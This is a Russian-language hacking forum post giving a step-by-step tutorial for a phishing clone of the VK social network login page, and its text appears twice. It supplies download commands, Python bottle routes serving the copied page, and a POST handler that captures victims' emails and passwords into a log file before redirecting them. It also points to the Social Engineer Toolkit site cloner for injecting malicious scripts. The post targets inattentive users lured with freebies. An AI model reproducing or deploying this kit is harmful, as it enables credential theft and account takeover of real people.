jahh
Юзер
- Сообщения
- 112
- Реакции
- 40
Этап №3 -"Фейк наше все"
Данный способ предназначен для невнимательных людей. По большей части их либо завлекают халявой, либо отвлекают внимание с помощью многобукв. Я покажу вам, как создать простой фейк на основе обычного сайта вк(страницы логина). Можете брать, как мобильную, так и основную версии зависит от того, с какого устройства будет заходить юзер.
Насчет регистрации на хостинге и покупки похожего домена ничего писать не буду, так как это банально просто.
Ручной способ:
Первым делом качаем страницу логина вк через ваш браузер. Затем смените кодировку html файла на utf-8.
Сначала определяем кодировку
file --mime-encoding file.html
Затем меняем с исходной на новую
iconv -f iso-8859-1 -t utf-8 file.html > vk2.html
Далее вам нужно создать управление страницей на серверном языке. Для этой цели
я также использовал python. Можно заюзать простейший фреймворк под названием bottle. Его плюс, в том что ему не нужны никакие зависимости. Просто качаете файл скрипта с сайта и все.
@route('/')
def index():
return template('vk2.html')
@route('/Welcome! | VK_files/<filepath:path>')
def server_static(filepath):
return static_file(filepath, root='./Welcome! | VK_files/')
После тестового запуска скрипта обнаружилась ошибка 404 на кое-каких файлах.
У нас к сожалению не имеется нужных картинок с сайта. Давайте положим их в отдельную папку images.
mkdir images
cd images
wget
wget "
wget "
mkdir icons
cd icons
wget "
wget "
Пропишем новый роутинг в скрипте.
@route('/images/<filepath:path>')
def server_static(filepath):
return static_file(filepath, root='./images/')
Теперь все стало на порядок красивее. Вы конечно можете скачать также основные страницы, на которые можно перейти с основной не залогинившись, чтобы было правдоподобней(а потом поменять ссылки в основной), но и одной хватит.
Чего же не хватает? Ах да конечно. После логина ничего не происходит. Давайте изменим это.
Добавим роутинг для пост запроса. Найдем форму логина на странице. Изменим в ее коде action на пустое и удалим проверку onsubmit. И добавим обработку post-запроса.
@post('/')
def index():
login = request.forms.get('email')
password = request.forms.get('pass')
print "|Catch|-------------- " + login + ':' + password
with open("log.txt", "a") as myfile:
myfile.write(login + ':' + password + "\n")
return redirect('
Так работает. Правда пока лишь после нажатия enter, но не по клику кнопки.
Переносим тег button, что под формой в коде в пределы формы и добавляем свойство type="submit".
После этого кнопка работает, как надо.
Архив с готовым решением.
--
Автоматический способ:
Если хотите использовать уже готовое решение, то можно воспользоваться тулкитом SET. Social Engineer Toolkit. Входит в дистрибутив кали. Можно установить на обычный debian на сервере, используя репы kali или установив все зависимости по отдельности.
Используем функцию site cloner в составе set. В нем есть дополнительные возможности, такие как встраивание вредоносных скриптов прямо в страницу или же добавление опасных flash.
Вложения
Данный способ предназначен для невнимательных людей. По большей части их либо завлекают халявой, либо отвлекают внимание с помощью многобукв. Я покажу вам, как создать простой фейк на основе обычного сайта вк(страницы логина). Можете брать, как мобильную, так и основную версии зависит от того, с какого устройства будет заходить юзер.
Насчет регистрации на хостинге и покупки похожего домена ничего писать не буду, так как это банально просто.
Ручной способ:
Первым делом качаем страницу логина вк через ваш браузер. Затем смените кодировку html файла на utf-8.
Сначала определяем кодировку
file --mime-encoding file.html
Затем меняем с исходной на новую
iconv -f iso-8859-1 -t utf-8 file.html > vk2.html
Далее вам нужно создать управление страницей на серверном языке. Для этой цели
я также использовал python. Можно заюзать простейший фреймворк под названием bottle. Его плюс, в том что ему не нужны никакие зависимости. Просто качаете файл скрипта с сайта и все.
@route('/')
def index():
return template('vk2.html')
@route('/Welcome! | VK_files/<filepath:path>')
def server_static(filepath):
return static_file(filepath, root='./Welcome! | VK_files/')
После тестового запуска скрипта обнаружилась ошибка 404 на кое-каких файлах.
У нас к сожалению не имеется нужных картинок с сайта. Давайте положим их в отдельную папку images.
mkdir images
cd images
wget
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки.
wget "
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки.
"wget "
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки.
"mkdir icons
cd icons
wget "
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки.
"wget "
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки.
"Пропишем новый роутинг в скрипте.
@route('/images/<filepath:path>')
def server_static(filepath):
return static_file(filepath, root='./images/')
Теперь все стало на порядок красивее. Вы конечно можете скачать также основные страницы, на которые можно перейти с основной не залогинившись, чтобы было правдоподобней(а потом поменять ссылки в основной), но и одной хватит.
Чего же не хватает? Ах да конечно. После логина ничего не происходит. Давайте изменим это.
Добавим роутинг для пост запроса. Найдем форму логина на странице. Изменим в ее коде action на пустое и удалим проверку onsubmit. И добавим обработку post-запроса.
@post('/')
def index():
login = request.forms.get('email')
password = request.forms.get('pass')
print "|Catch|-------------- " + login + ':' + password
with open("log.txt", "a") as myfile:
myfile.write(login + ':' + password + "\n")
return redirect('
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки.
')Так работает. Правда пока лишь после нажатия enter, но не по клику кнопки.
Переносим тег button, что под формой в коде в пределы формы и добавляем свойство type="submit".
После этого кнопка работает, как надо.
Архив с готовым решением.
--
Автоматический способ:
Если хотите использовать уже готовое решение, то можно воспользоваться тулкитом SET. Social Engineer Toolkit. Входит в дистрибутив кали. Можно установить на обычный debian на сервере, используя репы kali или установив все зависимости по отдельности.
Используем функцию site cloner в составе set. В нем есть дополнительные возможности, такие как встраивание вредоносных скриптов прямо в страницу или же добавление опасных flash.
Вложения
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки.
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки.
